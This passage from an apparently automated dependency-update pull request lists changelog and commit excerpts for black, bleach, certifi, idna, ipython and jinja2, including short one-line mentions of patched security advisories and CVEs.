unsafe changes to strings. Previous versions\nof Black would incorrectly format the contents of certain unusual f-strings containing\nnested strings with the same quote type. Now, Black will crash on such strings until\nsupport for the new f-string syntax is implemented. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4270\"\u003e#4270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix a bug where line-ranges exceeding the last code line would not work as expected\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4273\"\u003e#4273\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix catastrophic performance on docstrings that contain large numbers of leading tab\ncharacters. This fixes\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4278\"\u003e#4278\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNote what happens when \u003ccode\u003e--check\u003c/code\u003e is used with \u003ccode\u003e--quiet\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4236\"\u003e#4236\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.2.0\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where comments where mistakenly removed along with redundant parentheses\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4218\"\u003e#4218\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMove the \u003ccode\u003ehug_parens_with_braces_and_square_brackets\u003c/code\u003e feature to the unstable style\ndue to an outstanding crash and proposed formatting tweaks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4198\"\u003e#4198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where base expressions caused inconsistent formatting of ** in tenary\nexpression (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChecking for newline before adding one on docstring that is almost at the line limit\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in \u003ccode\u003ecase\u003c/code\u003e statement \u003ccode\u003eif\u003c/code\u003e guards (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/psf/black/commits/24.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bleach` from 3.1.5 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v3.1.5...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.4.5.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.04.05.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.9 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.9...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 7.15.0 to 8.10.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ipython/ipython/releases\"\u003eipython's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eSee \u003ca href=\"https://pypi.org/project/ipython/\"\u003ehttps://pypi.org/project/ipython/\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eWe do not use GitHub release anymore. Please see PyPI \u003ca href=\"https://pypi.org/project/ipython/\"\u003ehttps://pypi.org/project/ipython/\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e7.0.0-doc\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/15ea1ed5a886d6c19c1cc4856f2cf04a2a547c57\"\u003e\u003ccode\u003e15ea1ed\u003c/code\u003e\u003c/a\u003e release 8.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/560ad109197c0f8373865896af369bb3b36fd229\"\u003e\u003ccode\u003e560ad10\u003c/code\u003e\u003c/a\u003e DOC: Update what's new for 8.10 (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13939\"\u003e#13939\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/7557ade0ed927475d5ab5b573d0ea4febfb22683\"\u003e\u003ccode\u003e7557ade\u003c/code\u003e\u003c/a\u003e DOC: Update what's new for 8.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/385d69325319a5972ee9b5983638e3617f21cb1f\"\u003e\u003ccode\u003e385d693\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-29gw-9793-fvw7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/e548ee23ac460a99901f1cd43b94ae84a35ec393\"\u003e\u003ccode\u003ee548ee2\u003c/code\u003e\u003c/a\u003e Swallow potential exceptions from showtraceback() (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13934\"\u003e#13934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/0694b08b436203817059ec7e7136cf8561a6f013\"\u003e\u003ccode\u003e0694b08\u003c/code\u003e\u003c/a\u003e MAINT: mock slowest test. (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/13885\"\u003e#13885\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/865591252a67c6907fe03228b4053305715286e6\"\u003e\u003ccode\u003e8655912\u003c/code\u003e\u003c/a\u003e MAINT: mock slowest test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/a011765b44febfb11bae122d2ed7db763621ac8f\"\u003e\u003ccode\u003ea011765\u003c/code\u003e\u003c/a\u003e Isolate the attack tests with setUp and tearDown methods\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/c7a9470e540392c575aac46c3ee5cf4fe5123eb1\"\u003e\u003ccode\u003ec7a9470\u003c/code\u003e\u003c/a\u003e Add some regression tests for this change\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/fd34cf5f1f6e243243c738c6e0cf62eb682c4d68\"\u003e\u003ccode\u003efd34cf5\u003c/code\u003e\u003c/a\u003e Swallow potential exceptions from showtraceback()\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/7.15.0...8.10.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.2 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from 